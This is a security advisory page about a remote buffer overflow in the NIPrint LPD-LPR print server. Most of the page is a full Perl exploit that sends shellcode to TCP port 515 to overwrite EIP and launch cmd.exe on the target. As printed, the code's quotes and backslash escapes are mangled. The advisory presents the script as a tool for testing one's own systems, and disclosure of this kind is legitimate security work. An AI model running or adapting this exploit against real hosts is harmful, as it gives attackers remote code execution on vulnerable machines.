‘NIPrint LPD-LPR Print Server (Exploit)’

Summary

‘As we reported in our previous article NIPrint LPD-LPR Print Server (Long Request), a vulnerability in NIPrint allows remote attackers to overflow an internal buffer, this in turn can be used to overwrite the EIP address, allowing code execution.

The following exploit code can be used to test your system for the mentioned vulnerability.’

Credit:

‘The information has been provided by SecurITeam Experts.’


Details

Vulnerable systems:
 * NIPrint LPD-LPR Print Server version 4.10 and prior

Exploit:
#!/usr/bin/perl
use IO::Socket;

$shellcode = join (”,
‘x90’, # – NOP
‘xCC’, # – INT3
‘x90’, # – NOP
‘x90’, # – NOP
‘x90’, # – NOP
‘x90’, # – NOP
‘x8BxEC’, # – MOV EBP, ESP
‘x55’, # – PUSH EBP
‘x8BxEC’, # – MOV EBP, ESP
‘x33xFF’, # – XOR EDI, EDI
‘x57’, # – PUSH EDI
‘x83xECx04’, # 0 SUB ESP, 4
‘xC6x45xF8x63’, # – MOV BYTE PTR SS:[EBP-8],63h
‘xC6x45xF9x6D’, # – MOV BYTE PTR SS:[EBP-7],6Dh
‘xC6x45xFAx64’, # – MOV BYTE PTR SS:[EBP-6],64h
‘xC6x45xFBx2E’, # – MOV BYTE PTR SS:[EBP-5],2Eh
‘xC6x45xFCx65’, # – MOV BYTE PTR SS:[EBP-4],65h
‘xC6x45xFDx78’, # – MOV BYTE PTR SS:[EBP-3],78h
‘xC6x45xFEx65’, # – MOV BYTE PTR SS:[EBP-2],65h
‘xB8xC3xAFx01x78’, # – MOV EAX, MSVCRT.system
‘x50’, # – PUSH EAX
‘x8Dx45xF8’, # – LEA EAX, DWORD PTR SS:[EBP-8]
‘x50’, # – PUSH EAX
‘xFFx55xF4’, # – CALL DWORD PTR SS:[EBP-C]
‘x5F’ # – POP EDI
);

# 0x77f950cb is call ESI in Win2k SP4
$eip = ‘xcbx50xf9x77’;
#$eip = ‘BBBB’;

$buf = ”;

$buf .= ‘xCC’; # INT 3
$buf .= ‘x83xC4x04’; # Add ESP+4
$buf .= ‘xFFxE4’; # Jmp ESP
$buf .= ‘A’x(49-6);

$buf .= $eip;
$buf .= $shellcode;

unless (@ARGV == 1) { die ‘usage: $0 host …’ }
$host = shift(@ARGV);
$remote = IO::Socket::INET->new( Proto => ‘tcp’,
                                 PeerAddr => $host,
                                 PeerPort => ‘515’,
                                 );
unless ($remote) { die ‘cannot connect to LDP daemon on $host’ }

$remote->autoflush(1);

print $remote $buf;

while (<$remote>)
{
 print $_;
}’

Categories: Exploits